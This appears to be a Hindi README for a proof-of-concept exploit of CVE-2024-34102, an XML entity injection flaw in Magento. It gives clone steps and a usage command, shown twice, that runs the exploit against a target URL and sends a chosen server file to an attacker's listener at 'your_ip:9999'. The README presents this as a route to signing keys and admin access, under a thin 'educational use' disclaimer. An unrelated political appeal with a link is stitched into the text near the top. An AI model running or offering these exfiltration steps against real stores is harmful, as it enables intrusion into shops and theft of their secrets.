
CVE-2024-34102 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो Magento में एक गंभीर XML एंटिटी इंजेक्शन है, जो संवेदनशील फाइलों के बाहर निकालने और अनधिकृत एडमिन एक्सेस को सक्षम बनाता है। शैक्षिक उपयोग के लिए।
हम सभी नागरिकों की सुरक्षित वापसी की मांग करते हैं जिन्हें आतंकवादी समूह हमास ने बंधक बनाया है। हम तब तक आराम नहीं करेंगे जब तक हर बंधक को रिहा नहीं किया जाता और वह सुरक्षित घर नहीं लौटता। आप उन्हें घर वापस लाने में मदद कर सकते हैं। https://stories.bringthemhomenow.net/
इस रिपॉजिटरी में Magento में महत्वपूर्ण XML entity injection भेद्यता (CVE-2024-34102) के लिए एक proof-of-concept (PoC) exploit शामिल है। यह भेद्यता संवेदनशील फ़ाइलों के बहिर्गमन (exfiltration) की अनुमति देती है, जिसका उपयोग बाद में Magento के प्रशासनिक कार्यों तक अनधिकृत पहुंच प्राप्त करने के लिए किया जा सकता है। यह exploit शैक्षिक उद्देश्यों के लिए डिज़ाइन किया गया है और इसका उपयोग जिम्मेदारी से किया जाना चाहिए।
Magento दुनिया भर में उपयोग किए जाने वाले सबसे लोकप्रिय ई-कॉमर्स समाधानों में से एक है। जून 2024 में, एक महत्वपूर्ण pre-authentication XML entity injection समस्या की खोज की गई, जिसे CVE-2024-34102 के रूप में पहचाना गया। यह भेद्यता गंभीर परिणामों का कारण बन सकती है, जिसमें Magento से app/etc/env.php फ़ाइल का बहिर्गमन शामिल है, जिसमें JWT पर हस्ताक्षर करने के लिए उपयोग की जाने वाली क्रिप्टोग्राफ़िक कुंजियाँ होती हैं।
requests लाइब्रेरी (pip install requests)रिपॉजिटरी को क्लोन करें:
git clone https://github.com/yourusername/CVE-2024-34102-exploit.git
cd CVE-2024-34102-exploit
आवश्यक तर्कों के साथ स्क्रिप्ट निष्पादित करें:
python cve_2024_34102_exploit.py --target-url http://example.com --target-file /etc/hosts --exfil-url your_ip:9999
--target-url: लक्षित Magento इंस्टेंस का URL।--target-file: लक्षित सर्वर पर बहिर्गमन करने के लिए फ़ाइल पथ।--exfil-url: बहिर्गमित डेटा प्राप्त करने के लिए URL।python cve_2024_34102_exploit.py --target-url http://example.com --target-file /etc/hosts --exfil-url your_ip:9999